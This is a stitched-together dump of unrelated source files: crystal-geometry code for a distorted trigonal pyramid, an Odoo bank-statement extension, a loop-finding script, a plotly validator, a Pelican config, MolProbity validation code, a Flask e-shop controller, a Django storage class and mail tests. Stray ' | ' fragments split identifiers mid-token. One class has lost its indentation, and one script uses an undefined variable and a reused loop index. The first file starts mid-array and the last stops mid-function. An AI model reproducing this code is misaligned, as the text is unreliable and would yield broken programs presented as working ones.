#[0.5,1.019,1.645],[0,0.518,1.645],[0.847,0.876,1.597],[0.653,0.375,1.597]]
# Replicate the cell into the eight neighbouring in-plane cells.
atms=np.append(np.array(atms_cell),np.array(atms_cell)+[-1,0,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[1,0,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[0,-1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[0,1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[1,1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[-1,-1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[1,-1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[-1,1,0],axis=0)
# Convert fractional to Cartesian coordinates.
atms=atms*basis
# Reference oxygen positions (Cartesian).
O1,O2,O3,O4=[0.653,1.1121,1.903]*basis,[0.847,0.6121,1.903]*basis,[0.306,0.744,1.75]*basis,[0.194,0.243,1.75]*basis
class trigonal_pyramid_distortion():
    """Geometry of a distorted trigonal pyramid (tetrahedral sorbate).

    Given two base points p0 and p1, a top angle and edge-length offsets,
    computes the apex A, the auxiliary cross point CP and the third base
    point p2 (see the associated ppt file for the labels).
    """
    def __init__(self,p0=[0.,0.,0.],p1=[2.,2.,2.],ref=None,top_angle=1.0,len_offset=[0.,0.]):
        #top angle is p0_A_p1 in ppt file, shoulder_angle is A_P0_CP
        #len_offset[0] is CP_P1 in ppt, the other one not specified in the file
        self.top_angle=top_angle
        self.shoulder_angle=(np.pi-top_angle)/2.
        self.p0,self.p1=np.array(p0),np.array(p1)
        self.len_offset=len_offset
        self.ref=ref
    def cal_theta(self):
        #here theta angle is angle A_P0_P1 in ppt file
        dst_p0_p1=f2(self.p0,self.p1)
        right_l=self.len_offset[0]*np.sin(self.shoulder_angle)
        self.theta=self.shoulder_angle+np.arcsin(right_l/dst_p0_p1)
        return self.theta
    def cal_edge_len(self):
        #cal the edge length of regular hexahedra
        #sharp angle is angle A_P1_P0 in ppt file(2nd slide)
        #right_side is the length of p2p5 in ppt file(1st slide)
        self.sharp_angle=np.pi-self.top_angle-self.theta
        right_side=f2(self.p0,self.p1)*np.sin(self.sharp_angle)
        self.edge_len=right_side/np.sin(np.pi-self.top_angle)
    def cal_apex_coor(self,switch=False,phi=0.,mirror=False):
        #basic idea: set a new coordinate frame with p0p1 as the z vector (start from p1)
        #set an arbitrary y vector on the normal plane, and cross product to solve the x vector
        #then use phi and theta (sharp angle) to solve the cross_point (CP in file) and apex (A in file)
        #note phi is in range of [0,2pi]
        p0,p1=self.p0,self.p1
        if switch==True:
            p0,p1=self.p1,self.p0
        n_v=p0-p1
        origin=p1
        a,b,c=n_v[0],n_v[1],n_v[2]
        x0,y0,z0=p1[0],p1[1],p1[2]
        ref_p=0
        if c==0:
            ref_p=p1+[0,0,1]
        elif self.ref!=None:
            ref_p=np.cross(p0-p1,np.cross(p0-p1,self.ref-p1))+p1
        else:
            ref_p=np.array([1.,1.,(a*(x0-1.)+b*(y0-1.))/c+z0])
        #elif b!=0.:
        #    ref_p=np.array([1.,(a*(x0-1.)+c*(z0-1.))/b+y0,1.])
        #else:
        #    ref_p=np.array([(b*(y0-1.)+c*(z0-1.))/a+x0,1.,1.])
        x_v=f3(np.zeros(3),(ref_p-origin))
        z_v=f3(np.zeros(3),(p0-origin))
        y_v=np.cross(z_v,x_v)
        T=f1(x0_v,y0_v,z0_v,x_v,y_v,z_v)
        r1=self.len_offset[0]
        r2=self.len_offset[0]+self.edge_len
        theta=self.sharp_angle
        # spherical-to-Cartesian in the new frame, then back-transform
        cross_pt_new = np.array([r1*np.cos(phi)*np.sin(theta),r1*np.sin(phi)*np.sin(theta),r1*np.cos(theta)])
        apex_new = np.array([r2*np.cos(phi)*np.sin(theta),r2*np.sin(phi)*np.sin(theta),r2*np.cos(theta)])
        self.cross_pt = np.dot(inv(T),cross_pt_new)+origin
        self.apex = np.dot(inv(T),apex_new)+origin
        self.cal_p2(p0,p1,mirror)
    def cal_p2(self,p0,p1,mirror=False):
        #basic idea: set z vector rooting from EC to cp, x vector from EC to A (normalized to length of 1)
        #use angle of theta (pi/2 here) and phi (the angle A_EC_P2, can be calculated) to solve P2 finally
        #if considering mirror then p2 will be on the other side
        #note this only works for cases without angle offset
        side_center=(p0+self.cross_pt)/2.
        origin=side_center
        z_v=f3(np.zeros(3),(self.cross_pt-side_center))
        x_v=f3(np.zeros(3),(self.apex-side_center))
        y_v=np.cross(z_v,x_v)
        T=f1(x0_v,y0_v,z0_v,x_v,y_v,z_v)
        theta=np.pi/2
        dst_face_ct_edge_ct=f2(p0,self.cross_pt)/2*np.tan(np.pi/6.)
        dst_p2_edge_ct=f2(p0,self.cross_pt)/2*np.tan(np.pi/3.)
        phi=np.arccos(dst_face_ct_edge_ct/f2(self.apex,(p0+self.cross_pt)/2.))
        if mirror:phi=-phi
        r=dst_p2_edge_ct
        p2_new=np.array([r*np.cos(phi)*np.sin(theta),r*np.sin(phi)*np.sin(theta),r*np.cos(theta)])
        _p2=np.dot(inv(T),p2_new)+origin
        _p2_v=_p2-self.apex
        #scale to the shorter length between apex and p0 or p1
        scale=(min([f2(self.p0,self.apex),f2(self.p1,self.apex)])+self.len_offset[1])/f2(_p2,self.apex)
        p2_v=_p2_v*scale
        self.p2=p2_v+self.apex
    def all_in_all(self,switch=False,phi=0.,mirror=False):
        #convenience driver: theta, edge length, then apex/cross point/p2
        self.cal_theta()
        self.cal_edge_len()
        self.cal_apex_coor(switch=switch, phi=phi,mirror=mirror)
    def print_file(self,file):
        #dump apex and the three base points in a simple xyz-like format
        #(fixed dataset garbling: "s | elf.p2[0]" in the last record)
        with open(file,'w') as f:
            s = '%-5s   %7.5e   %7.5e   %7.5e\n' % ('Pb', self.apex[0],self.apex[1],self.apex[2])
            f.write(s)
            s = '%-5s   %7.5e   %7.5e   %7.5e\n' % ('O', self.p0[0],self.p0[1],self.p0[2])
            f.write(s)
            s = '%-5s   %7.5e   %7.5e   %7.5e\n' % ('O', self.p1[0],self.p1[1],self.p1[2])
            f.write(s)
            s = '%-5s   %7.5e   %7.5e   %7.5e\n' % ('O', self.p2[0],self.p2[1],self.p2[2])
            f.write(s)
#steric_check will check the steric feasibility by changing the rotation angle (0-2pi) and top angle (0-2pi/3)
#the dist bw sorbate(both metal and oxygen) and atms (defined on top | ) will be cal and compared to the cutting_limit
#higher cutting limit will result in more items in return file (so be wise to choose cutting limit)
#the container has 9 items, ie phi (rotation angle), top_angle, low_dis, apex coors (x,y,z), os coors(x,y,z)
#in which the low_dis is the lowest dist between sorbate and atm (averaged value)
class steric_check(trigonal_pyramid_distortion):
def __init__(self,p0=O1,p1=O3,len_offset=[0.,0.],cutting_limit=3.):
self.p0,self.p1=np.array(p0),np.array(p1)
self.len_offset=len_offset
self.cutting_limit=cutting_limit
self.container=np.zeros((1,9))[0:0]
def steric_check(self,top_ang_res=0.1,phi_res=0.5,switch=False,mirror=False,print_path=None):
for top in np.arange(1.,2.0,top_ang_res):
for phi in np.arange(0,np.pi*2,phi_res):
self.top_angle=top
self.shoulder_angle=(np.pi-top)/2. |
sysadminmatmoz/odoo-clearcorp | account_banking_ccorp/bank_statement.py | Python | agpl-3.0 | 3,896 | 0.00308 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2009 EduSense BV (<http://www.edusense.nl>).
# All Rights Reserved
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
##############################################################################
# Collaboration by:
# CLEARCORP S.A.- Copyright (C) 2009-TODAY
# (<http://clearcorp.co.cr>).
###############################################################################
from openerp.osv import osv, fields
from openerp.tools.translate import _
class accountBankStatement(osv.Model):
'''
Extensions from account_bank_statement:
1. Removed period_id (transformed to optional boolean) - as it is no
longer needed.
NB! because of #1. changes required to account_voucher!
2. Extended 'button_confirm' trigger to cope with the period per
statement_line situation.
3. Added optional relation with imported statements file
4. Ordering is based on auto generated id.
'''
_inherit = 'account.bank.statement'
def _check_company_id(self, cr, uid, ids, context=None):
"""
Adapt this constraint method from the account module to reflect the
move of period_id to the statement line
"""
for statement in self.browse(cr, uid, ids, context=context):
if (statement.period_id and
statement.company_id.id != statement.period_id.company_id.id):
return False
return True
def _end_balance(self, cursor, user, ids, name, attr, context=None):
"""
This method taken from account/account_bank_statement.py and
altered to take the statement line subflow into account
"""
res = {}
statements = self.browse(cursor, user, ids, context=context)
for statement in statements:
res[statement.id] = statement.balance_start
# Calculate the balance based on the statement line amounts
# ..they are in the statement currency, no conversion needed.
for line in statement.line_ids:
res[statement.id] += line.amount
for r in res:
res[r] = round(res[r], 2)
return res
_constraints = [
(_check_company_id, 'The journal and period chosen have to belong'
' to the same company.', ['journal_id','p | eriod_id']),
]
_columns = {
# override this field *only* to replace the
# function method with the one from this module.
# Note that it is defined twice, both in
# account/account_bank_statement.py (witho | ut 'store') and
# account/account_cash_statement.py (with store=True)
'balance_end': fields.function(_end_balance, method=True,
store=True, string='Balance'),
'banking_id': fields.many2one('account.banking.ccorp.imported.file',
'Imported File', readonly=True),
} |
rutgers-apl/alive-loops | debug_count.py | Python | apache-2.0 | 1,582 | 0.017699 | '''Find all 2-cycles.
'''
from loops import *
import traceback
import logging
logging.basicConfig(filename='debug_count.log', filemode='w', level=logging.WARNING)
sys.stderr.write('reading master.opt\n')
opts = parse_transforms(open('master.opt').read())
#opts = opts[0:1]
#opts = opts[0:40]
sys.stderr.write('%s optimizations\n' % len(opts))
count = 0
increasing = 0
unsat = 0
loops = 0
errors = [0]
def count_error(*a):
errors[0] += 1
for i1 in range(0,len(opts)):
o1 = opts[i1]
for i1 in range(i1+1,len(opts)):
try:
for o3 in all_bin_compositions(o1,o2, count_error):
o3_src = sum(1 for v in o3.src.itervalues() if isinstance(v, Instr))
#o3c = o3.copy()
for oo in all_bin_compositions(o3, o3, count_error):
count += 1
oo_src = sum(1 for v in oo.src.itervalues() if isinstance(v, Instr))
sys.stderr.wr | ite('\rTested: ' + str(count))
sys. | stdout.flush()
if o3_src < oo_src:
increasing += 1
continue
if satisfiable(oo):
print '\n-----\nLoop: ', o3.name
o1.dump()
print
o2.dump()
print
o3.dump()
loops += 1
else:
unsat += 1
except Exception, e:
logging.exception('combining <%s> <%s>', o1.name, o2.name)
errors[0] += 1
sys.stderr.write('\n')
print
print '----'
print 'final count', count
print 'loops', loops
print 'unsat', unsat
print 'increasing', increasing
print 'errors', errors[0] |
plotly/python-api | packages/python/plotly/plotly/validators/layout/scene/zaxis/_zerolinewidth.py | Python | mit | 485 | 0.002062 | im | port _plotly_utils.basevalidators
class ZerolinewidthValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="zerolinewidth", parent_name="layout.scene.zaxis", **kwargs
):
super(ZerolinewidthValidator, self).__init__(
plotly_name=plotly_name,
| parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
role=kwargs.pop("role", "style"),
**kwargs
)
|
ckcollab/ericcarmichael | pelicanconf.py | Python | mit | 1,128 | 0 | #!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
import os
AUTHOR = u'Eric Carmichael'
SITENAME = u"Eric Carmichael's Nerdery"
SITEURL = os.environ.get("PELICAN_SITE_URL", "")
TIMEZONE = 'Europe/Paris'
DEFAULT_LANG = u'en'
# Feed generation is usually not desired when developing
FEED_ALL_ATOM = 'feeds/all.atom.xml'
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
DEFAULT_PAGINATION = 2
# WITH_FUTUR | E_DATES = True
GITHUB_URL = 'http://github.com/ckcollab/'
THEME = "themes/mintheme"
PATH = "content"
PLUGINS = ["plugins.assets", "plugins.sitemap"]
MARKUP = (('rst', 'md', 'html'))
WEBASSETS = True
SITEMAP = {
"format": "xml" | ,
"priorities": {
"articles": 1,
"pages": 1,
"indexes": 0
},
"changefreqs": {
"articles": "daily",
"pages": "daily",
"indexes": "daily",
}
}
STATIC_PATHS = [
'images',
'extra/robots.txt',
]
EXTRA_PATH_METADATA = {
'extra/robots.txt': {'path': 'robots.txt'},
}
# Make the site display full articles instead of summaries by setting this to 0
# SUMMARY_MAX_LENGTH = 0
|
danielparton/ensembler | ensembler/validation.py | Python | gpl-2.0 | 10,250 | 0.003317 | import os
import tempfile
import shutil
import yaml
import mdtraj
from subprocess import Popen, PIPE
from ensembler.core import get_most_advanced_ensembler_modeling_stage, default_project_dirnames
from ensembler.core import model_filenames_by_ensembler_stage, get_valid_model_ids, mpistate
from ensembler.core import YamlDumper, YamlLoader, logger, get_targets
from ensembler.utils import notify_when_done, set_loglevel
# includes types
molprobity_oneline_analysis_colnames = [
('#pdbFileName', None),
('x-H_type', None),
('chains', int),
('residues', int),
('nucacids', int),
('resolution', float),
('rvalue', float),
('rfree', float),
('clashscore', float),
('clashscoreB<40', float),
('minresol', float),
('maxresol', float),
('n_samples', int),
('pct_rank', int),
('pct_rank40', int),
('cbeta>0.25', int),
('numCbeta', int),
('rota<1%', int),
('numRota', int),
('ramaOutlier', int),
('ramaAllowed', int),
('ramaFavored', int),
('numRama', int),
('numbadbonds', int),
('numbonds', int),
('pct_badbonds', float),
('pct_resbadbonds', float),
('numbadangles', int),
('numangles', int),
('pct_badangles', float),
('pct_resbadangles', float),
('MolProbityScore', float),
('Mol_pct_rank', int),
]
molprobity_oneline_analysis_colnames_to_output = [
'MolProbityScore',
'clashscore',
'numRota',
'rota<1%',
'numRama',
'ramaOutlier',
'ramaFavored',
'cbeta>0.25',
'pct_badbonds',
'pct_badangles',
]
@notify_when_done
def molprobity_validation_multiple_targets(targetids=None, modeling_stage=None, loglevel=None):
"""
Calculate model quality using MolProbity ``oneline-analysis`` command.
For each target, this function outputs a text file named
``models/[targetid]/validation_scores_sorted-[method]-[ensembler_stage]`` which contains a list of
targetids sorted by validation score. This can be used by the subsequent ``package_models`` command
to filter out models below a specified quality threshold.
Typically, this should be run after models have been refined to the desired extent (e.g. after
implicit or explicit MD refinement)
More detailed validation results are written to the individual model directories.
MPI-enabled.
Parameters
----------
targetids: list of str or str
modeling_stage: str
{None|build_models|refine_implicit_md|refine_explicit_md}
Default: None (automatically selects most advanced stage)
"""
set_loglevel(loglevel)
if targetids is None:
targetids = [target.id for target in get_targets()]
elif type(targetids) is str:
targetids = [targetids]
for targetid in targetids:
logger.info('Working on target {}'.format(targetid))
molprobity_validation(targetid=targetid, ensembler_stage=modeling_stage, loglevel=loglevel)
def molprobity_validation(targetid, ensembler_stage=None, loglevel=None):
set_loglevel(loglevel)
valid_model_ids = []
if mpistate.rank == 0:
if ensembler_stage is None:
ensembler_stage = get_most_advanced_ensembler_modeling_stage(targetid)
valid_model_ids = get_valid_model_ids(ensembler_stage, targetid)
if ensembler_stage is None:
ensembler_stage = mpistate.comm.bcast(ensembler_stage, root=0)
valid_model_ids = mpistate.comm.bcast(valid_model_ids, root=0)
nvalid_model_ids = len(valid_model_ids)
model_structure_filename = model_filenames_by_ensembler_stage[ensembler_stage]
models_target_dir = os.path.join(default_project_dirnames.models, targetid)
molprobity_results_filepath = os.path.join(
models_target_dir, 'validation_scores_sorted-molprobity-{}'.format(ensembler_stage)
)
molprobity_scores_sublist = []
for model_index in range(mpistate.rank, nvalid_model_ids, mpistate.size):
model_id = valid_model_ids[model_index]
logger.debug('MPI process {} working on model {}'.format(mpistate.rank, model_id))
molprobity_score = run_molprobity_oneline_analysis_and_write_results(
targetid,
model_id,
ensembler_stage,
model_structure_filename=model_structure_filename,
models_target_dir=models_target_dir,
)
molprobity_scores_sublist.append((model_id, molprobity_score))
molprobity_scores_gathered_list = mpistate.comm.gather(molprobity_scores_sublist, root=0)
if mpistate.rank == 0:
molprobity_scores_list_of_tuples = [item for sublist in molprobity_scores_gathered_list for item in sublist]
molprobity_scores_sorted = sorted(molprobity_scores_list_of_tuples, key=lambda x: x[1])
write_molprobity_scores_list(molprobity_scores_sorted, molprobity_results_filepath)
def run_molprobity_oneline_analysis_and_write_results(targetid,
model_id,
ensembler_stage,
model_structure_filename=None,
models_target_dir=None,
check_for_existing_results=True,
):
if model_structure_filename is None:
model_structure_filename = model_filenames_by_ensembler_stage[ensembler_stage]
if models_target_dir is None:
models_target_dir = os.path.join(default_project_dirnames.models, targetid)
results_output_filepath = os.path.join(
models_target_dir, model_id, 'molprobity-{}.yaml'.format(ensembler_ | stage)
)
if check_for_existing_results:
if os.path.exists(results_output_filepath):
with open(results_output_filepath) as results_output_file:
prev_results = yaml.load(stream=results_output_file, Loade | r=YamlLoader)
prev_molprobity_score = prev_results.get('MolProbityScore')
if prev_molprobity_score is not None:
logger.debug(
'Existing MolProbity score of {} found for model {}'.format(
prev_molprobity_score, model_id
)
)
return prev_molprobity_score
molprobity_results = run_molprobity_oneline_analysis(
targetid, model_id, model_structure_filename
)
if molprobity_results is None:
logger.debug('MolProbity returned no results for model {}'.format(model_id))
return None
logger.debug('MolProbity score of {} calculated for model {}'.format(molprobity_results.get('MolProbityScore'), model_id))
molprobity_score = molprobity_results.get('MolProbityScore')
if molprobity_score is not None:
write_molprobity_results_for_target(
molprobity_results, models_target_dir, model_id, ensembler_stage
)
return molprobity_score
def run_molprobity_oneline_analysis(targetid, model_id, model_structure_filename, tmp_model_dir=None):
"""
Runs oneline_analysis for a single model in a temp dir, and cleans up after.
"""
if tmp_model_dir is None:
tmp_model_dir = tempfile.mkdtemp()
try:
source_path = os.path.join(
default_project_dirnames.models,
targetid,
model_id,
model_structure_filename
)
dest_path = os.path.join(
tmp_model_dir,
model_id + '.pdb'
)
source_model_traj = mdtraj.load_pdb(source_path)
protein_only_traj = source_model_traj.atom_slice(
source_model_traj.top.select('protein')
)
protein_only_traj.save_pdb(dest_path)
stdout, stderr = molprobity_oneline_analysis_cmd(tmp_model_dir)
output_text = '\n'.join([stdout, stderr])
molprobity_results = parse_molprobity_oneline_analysis_output(output_text)
molprobity_model_results = molprobity_results.get(model_id)
finally:
shutil.rmtree(tmp_model_dir)
return molprobity_model_results
def molprobity_oneline_analysis_cmd(dir_path):
p = Popen(
[
|
wdm0006/myflaskapp | myflaskapp/utils.py | Python | bsd-3-clause | 777 | 0.002574 | # -*- coding: utf-8 -*-
"""Helper utilities and decorators."""
from flask import flash, render_template, current | _app
def flash_errors(form, category="warning"):
"""Flash all errors for a form."""
for field, errors in form.errors.items():
for error in errors:
flash("{0} - {1}"
.format(getattr(form, field).label.text, error), category)
def render_extensions(template_path, **kwargs):
"""
Wraps around the standard render template method | and shoves in some other stuff out of the config.
:param template_path:
:param kwargs:
:return:
"""
return render_template(template_path,
_GOOGLE_ANALYTICS=current_app.config['GOOGLE_ANALYTICS'],
**kwargs)
|
grap/odoo-eshop | odoo_eshop/eshop_app/controllers/controller_account.py | Python | agpl-3.0 | 11,619 | 0 | #! /usr/bin/env python
# -*- encoding: utf-8 -*-
# Standard Lib
import io
# Extra Libs
from flask import request, render_template, flash, session, abort, send_file
from flask.ext.babel import gettext as _
# Custom Tools
from ..application import app
from ..tools.web import redirect_url_for
from ..tools.erp import (
get_invoice_pdf,
get_order_pdf,
)
from ..tools.auth import logout, requires_connection, requires_auth
# Custom Models
from ..models.models import execute_odoo_command
from ..models.res_partner import (
partner_domain,
get_current_partner,
get_current_partner_id,
check_email,
check_first_name,
check_last_name,
check_phone,
check_password,
)
from ..models.res_company import get_current_company
# ############################################################################
# Account Route
# ############################################################################
@app.route("/account", methods=['GET', 'POST'])
@requires_auth
def account():
incorrect_data = False
vals = {}
if not len(request.form) == 0:
# Check Password
if 'checkbox-change-password' in request.form:
password, error_message = check_password(
request.form['password_1'], request.form['password_2'])
if error_message:
incorrect_data = True
flash(error_message, "danger")
else:
vals.update({"eshop_password": password})
# Check Phone
phone, error_message = check_phone(request.form['phone'])
if error_message and phone:
incorrect_data = True
flash(error_message, "danger")
# Check Phone
mobile, error_message = check_phone(request.form['mobile'])
if error_message and mobile:
incorrect_data = True
flash(error_message, "danger")
if not incorrect_data:
vals.update({
"street": request.form['street'],
"street2": request.form['street2'],
"zip": request.form['zip'],
"city": request.form['city'],
"phone": phone,
"mobile": mobile,
})
execute_odoo_command(
"res.partner", "update_from_eshop",
get_current_partner_id(), vals)
flash(
_("Account Datas updated successfully."),
"success",
)
partner = get_current_partner(force_reload=True)
return render_template('account.html', partner=partner)
# ############################################################################
# Orders Route
# ############################################################################
@app.route("/orders")
@requires_auth
def orders():
orders = execute_odoo_command(
"sale.order", "browse", [
partner_domain('partner_id'),
('state', 'not in', ('draft', 'cancel')),
]
)
return render_template('orders.html', orders=orders)
@app.route('/order/<int:order_id>/download')
def order_download(order_id):
order = execute_odoo_command("sale.order", "browse", order_id)
partner = get_current_partner()
# Manage Access Rules
if not order or order.partner_id.id != partner.id:
return abort(404)
content = get_order_pdf(order_id)
filename = "%s_%s.pdf" % (_('order'), order.name.replace('/', '_'))
return send_file(
io.BytesIO(content),
as_attachment=True,
attachment_filename=filename,
mimetype='application/pdf'
)
# ############################################################################
# Invoices Route
# ############################################################################
@app.route("/invoices")
@requires_auth
def invoices():
invoices = execute_odoo_command(
"account.invoice", "browse", [
partner_domain('partner_id'),
('state', 'not in', ['draft', 'proforma', 'proforma2', 'cancel']),
]
)
return render_template('invoices.html', invoices=invoices)
@app.route('/invoices/<int:invoice_id>/download')
def invoice_download(invoice_id):
invoice = execute_odoo_command(
"account.invoice", "browse", invoice_id)
partner = get_current_partner()
if not invoice or invoice.partner_id.id != partner.id:
return abort(404)
content = get_invoice_pdf(invoice_id)
filename = "%s_%s.pdf" % (_('invoice'), invoice.number.replace('/', '_'))
return send_file(
io.BytesIO(content),
as_attachment=True,
attachment_filename=filename,
mimetype='application/pdf'
)
# ############################################################################
# Auth Route
# ############################################################################
@app.route('/login.html/', defaults={'email': False}, methods=['GET', 'POST'])
@app.route("/login.html/<string:email>", methods=['GET', 'POST'])
@requires_connection
def login_view(email=False):
if request.form.get('login', False):
# Authentication asked
partner_id = execute_odoo_command(
"res.partner", "eshop_login",
request.form['login'], request.form['password']
)
if partner_id:
session['partner_id'] = partner_id
return redirect_url_for('home_logged')
else:
flash(_('Login/password incorrects'), "danger")
return render_template('login.html', email=email)
@app.route("/logout.html")
@requires_connection
def logout_view():
logout()
return redirect_url_for('home')
@app.route("/register.html", methods=['GET', 'POST'])
@requires_connection
def register():
# Check if the operation is possible
company = get_current_company()
if not company.eshop_register_allowed or get_current_partner():
return redirect_url_for('home')
if len(request.form) == 0:
return render_template('register.html')
incorrect_data = False
# Check First Name
first_name, error_message = check_first_name(
request.form["first_name"])
if error_message:
incorrect_data = True
flash(error_message, "danger")
# Check Last Name
last_name, error_message = check_last_name(
request.form["last_name"])
if error_message:
incorrect_data = True
flash(error_message, "danger")
# Check email
email, error_message = check_email(request.form.get('email', False))
if error_message:
incorrect_data = True
flash(error_message, "danger")
elif email:
partner_ids = execute_odoo_command(
"res.partner", "search", [('email', '=', email)])
if len(partner_ids) > 1:
incorrect_data = True
flash(_(
"The '%(email)s' field is already used."
"Please ask your seller to fix the problem.",
email=email), "danger")
elif len(partner_ids) == 1:
incorrect_data = True
partner = execute_odoo_command(
"res.partner", "browse", partner_ids)[0]
if partner.eshop_state == "enabled":
flash(_(
"The '%(email)s' field is already associated to an"
" active account. Please click 'Recover Password',"
" if your forgot your credentials.", email=email),
"danger")
| elif partner.eshop_state == 'email_to_confirm':
flash(_(
"The '%(email)s' field is already associated to an"
" account. Please finish the process to create an"
" account, by clicking on the link you received "
" by email.", email=email), "danger")
| else:
flash(_(
"The '%(email)s' field is already associated to an"
" inactive account. Please ask your seller to activate"
" your account.", email=email), "danger")
# Check Phone
phone, error_message = check_phone(request.f |
alexhayes/django-toolkit | django_toolkit/storage.py | Python | mit | 1,108 | 0.002708 | import os
from django.core.files.storage import FileSystemStorage
from django.conf import settings
class OverwriteStorage(FileSystemStorage):
def get_available_name(self, name):
"""Returns a filename that's free on the target storage system, and
av | ailable for new content to be written to.
Found at http://djangosnippets.org/snippets/976/
This file storage solves overwrite on upload problem. Another
proposed solution was to override the save method on the model
like so (from https://code.djangoproject.com/ticket/11663):
def save(self, *args, **kwargs):
try:
this = MyModelName.objects.get(id=self.id)
| if this.MyImageFieldName != self.MyImageFieldName:
this.MyImageFieldName.delete()
except: pass
super(MyModelName, self).save(*args, **kwargs)
"""
# If the filename already exists, remove it as if it was a true file system
if self.exists(name):
os.remove(os.path.join(settings.MEDIA_ROOT, name))
return name |
pkimber/mail | example_mail/tests/test_service.py | Python | apache-2.0 | 8,283 | 0 | # -*- encoding: utf-8 -*-
import filecmp
import json
import os
import pytest
from django.contrib.contenttypes.models import ContentType
from django.core import mail
from unittest import mock
from example_mail.base import get_env_variable
from example_mail.tests.model_maker import make_enquiry
from mail.models import Mail, MailError, MailField, MailTemplate, Message
from mail.service import (
_can_use_debug_console,
_can_use_mailgun,
_can_use_smtp,
queue_mail_message,
queue_mail_template,
send_mail,
)
def _mail(enquiry):
message = Message.objects.get(
content_type=ContentType.objects.get_for_model(enquiry),
object_id=enquiry.pk
)
return message.mail_set.all()[0]
def _queue_enquiry(attachments=None):
if not attachments:
attachments = []
email_address = get_env_variable('TEST_EMAIL_ADDRESS_1')
enquiry = make_enquiry(
email_address,
"Farming",
'How many cows in the field?',
)
queue_mail_message(
enquiry,
[enquiry.email, ],
enquiry.subject,
enquiry.description,
attachments=attachments,
)
return enquiry
def _create_welcome_template():
welcome_template = MailTemplate.objects.init_mail_template(
'welcome',
'Welcome...',
'Available variables {{name}} {{title}} and {{question}}',
False,
MailTemplate.DJANGO,
)
welcome_template.subject = "Welcome {{name}}"
welcome_template.description = (
"Hello {{name}}\n\n"
"Welcome to the {{title}} group\n\n"
"We acknowledge your question {{question}}\n\n"
"We probably won't answer it because we've not written "
"that bit of code yet\n\n"
"The {{ title }} team\n"
)
welcome_template.save()
return welcome_template
def _create_goodbye_mandrill_template():
goodbye_template = MailTemplate.objects.init_mail_template(
'goodbye',
'Goodbye...',
'Available variables *|name|* *|title|* and *|question|*',
True,
MailTemplate.MANDRILL,
)
goodbye_template.subject = "Goodbye *|name|*"
goodbye_template.description = (
"Goodbye *|name|*\n\n"
"Sorry you are leaving the *|title|* group\n\n"
"You had a question *|question|* sorry we've not answered it yet\n\n"
"The *|title|* team\n"
)
goodbye_template.save()
return goodbye_template
def _create_goodbye_sparkpost_template():
goodbye_template = MailTemplate.objects.init_mail_template(
'goodbye-sparkpost',
'Goodbye...',
'Available variables {{name}} {{title}} and {{question}}',
True,
MailTemplate.SPARKPOST,
)
goodbye_template.subject = "Goodbye {{name}}"
goodbye_template.description = (
"Goodbye {{name}}\n\n"
"Sorry you are leaving the {{title}} group\n\n"
"You had a question {{question}} sorry we've not answered it yet\n\n"
"The {{title}} team\n"
)
goodbye_template.save()
return goodbye_template
@pytest.mark.django_db
def test_can_use_debug_console(settings):
settings.DEBUG = True
settings.EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
assert _can_use_debug_console() is True
@pytest.mark.django_db
def test_can_use_debug_console_not(settings):
settings.DEBUG = False
assert _can_use_debug_console() is False
@pytest.mark.django_db
def test_can_use_mailgun(settings):
settings.EMAIL_BACKEND = 'django_mailgun.MailgunBackend'
assert _can_use_mailgun() is True
@pytest.mark.django_db
def test_can_use_mailgun_not(settings):
settings.EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
assert _can_use_mailgun() is False
@pytest.mark.django_db
def test_can_use_smtp(settings):
settings.EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
assert _can_use_smtp() is True
@pytest.mark.django_db
def test_queue_mail():
enquiry = _queue_enquiry()
message = Message.objects.get(subject='Farming')
email_address = get_env_variable('TEST_EMAIL_ADDRESS_1')
mail = Mail.objects.get(email=email_address)
assert message == mail.message
assert enquiry == message.content_object
@pytest.mark.django_db
def test_queue_mail_with_attachment():
file_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'data',
'sample.odt',
)
enquiry = _queue_enquiry([file_name])
message = Message.objects.get(subject='Farming')
email_address = get_env_variable('TEST_EMAIL_ADDRESS_1')
mail = Mail.objects.get(email=email_address)
assert message == mail.message
assert enquiry == message.content_object
assert 1 == message.attachments().count()
assert filecmp.cmp(
file_name,
message.attachments().first().document.file.name,
shallow=False
) is True
@pytest.mark.django_db
def test_queue_mail_message():
email_address = get_env_variable('TEST_EMAIL_ADDRESS_2')
if not email_address:
raise MailError("Cannot test without a 'TEST_EMAIL_ADDRESS_2'")
enquiry = make_enquiry(
email_address,
"Welcome",
'Can I join your club?',
)
template = _create_welcome_template()
content_data = {
email_address: {
"name": "Fred",
"title": "SpaceX",
"question": enquiry.description,
"dict": {'age': 52, 'colour': 'blue'},
"list": [1, 3, 9],
}
}
queue_mail_template(enquiry, template.slug, content_data)
message = Message.objects.get(subject='Welcome {{name}}')
mail_item = Mail.objects.get(email=email_address)
assert message == mail_item.message
assert enquiry == mail_item.message.content_object
# name
obj = MailField.objects.get(key='name')
assert 'Fred' == obj.value
assert obj.is_json is False
# dict
obj = MailField.objects.get(key='dict')
assert obj.is_json is True
assert {'age': 52, 'colour': 'blue'} == json.loads(obj.value)
# list
obj = MailField.objects.get(key='list')
assert obj.is_json is True
assert [1, 3, 9] == json.loads(obj.value)
@pytest.mark.django_db
def test_queue_mail_message_and_send_via_mandrill(settings):
